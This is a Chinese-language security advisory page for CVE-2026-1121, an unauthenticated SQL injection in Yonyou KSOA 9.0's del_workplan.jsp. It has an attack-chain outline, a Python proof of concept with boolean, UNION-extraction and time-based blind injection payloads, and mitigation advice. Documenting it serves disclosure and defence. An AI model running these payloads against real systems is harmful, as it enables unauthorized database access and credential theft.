CVE-2026-1121 CVSS 7.3 高危

CVE-2026-1121: 用友KSOA 9.0 del_workplan.jsp SQL注入漏洞

披露日期: 2026-01-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1121

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

用友KSOA 9.0

漏洞概述

用友KSOA 9.0存在一处严重的SQL注入漏洞，漏洞位于/worksheet/del_workplan.jsp文件中的HTTP GET参数处理组件。攻击者可以通过操控ID参数注入恶意SQL语句，从而实现对数据库的非授权访问和操作。该漏洞无需任何认证即可利用，攻击者可远程发起攻击。由于该漏洞的利用代码已被公开披露，且厂商在收到通知后未做出任何回应，因此该漏洞对使用该产品的企业构成严重安全威胁。攻击成功可能导致敏感数据泄露、数据篡改或服务器完全沦陷。

技术细节

该漏洞为典型的SQL注入漏洞，存在于用友KSOA 9.0的文件/worksheet/del_workplan.jsp中。漏洞源于该文件对HTTP GET请求中ID参数的处理不当，未对用户输入进行充分的过滤和参数化查询。当用户提交包含恶意SQL代码的ID参数时，这些代码会被直接拼接到SQL查询语句中并执行。攻击者可以利用UNION SELECT、布尔盲注、时间盲注等技术从数据库中提取敏感信息，包括用户凭证、配置文件、业务数据等。由于该接口无需认证即可访问，远程攻击者可以直接通过HTTP请求利用此漏洞。此外，由于CVSS评分中可用性影响为低，攻击者可能需要结合其他技术手段才能实现完全的系统控制。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统，发现使用用友KSOA 9.0版本

STEP 2

步骤2

访问/worksheet/del_workplan.jsp端点，发现ID参数存在SQL注入漏洞

STEP 3

步骤3

构造恶意SQL payload，利用UNION SELECT或盲注技术提取数据库信息

STEP 4

步骤4

获取数据库中的敏感数据，包括用户账户、密码哈希等

STEP 5

步骤5

结合其他漏洞或凭据，进一步横向移动获取系统权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://target-server/worksheet/del_workplan.jsp"

# SQL Injection PoC - Boolean Based
payload_id = "1' AND 1=1--"
params = {"ID": payload_id}
response = requests.get(target_url, params=params)
print(f"Response Status: {response.status_code}")
print(f"Response Length: {len(response.text)}")

# Extract Database Version
payload_extract = "1' UNION SELECT NULL,version(),NULL,NULL,NULL--"
params_extract = {"ID": payload_extract}
response_extract = requests.get(target_url, params=params_extract)
print(f"Extracted Data: {response_extract.text}")

# Time-Based Blind SQL Injection
payload_time = "1'; IF(1=1) WAITFOR DELAY '0:0:5'--"
params_time = {"ID": payload_time}
response_time = requests.get(target_url, params=params_time)
print(f"Time-based injection completed")

影响范围

用友KSOA 9.0

防御指南

临时缓解措施

在厂商提供正式修复补丁之前，建议采取以下临时缓解措施：1) 通过网络层ACL限制对/worksheet/del_workplan.jsp的访问，仅允许可信IP访问；2) 在Web应用前部署WAF设备，配置SQL注入防护规则；3) 临时禁用该功能模块；4) 加强数据库监控日志，及时发现异常查询行为；5) 隔离相关服务器网段，防止攻击成功后横向渗透。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1121
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1121
3 Details https://www.cvedetails.com/cve/CVE-2026-1121/
4 VulDB https://vuldb.com/cve/CVE-2026-1121
5 Link https://github.com/LX-66-LX/cve/issues/7
6 Link https://vuldb.com/?ctiid.341713
7 Link https://vuldb.com/?id.341713
8 Link https://vuldb.com/?submit.734548

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表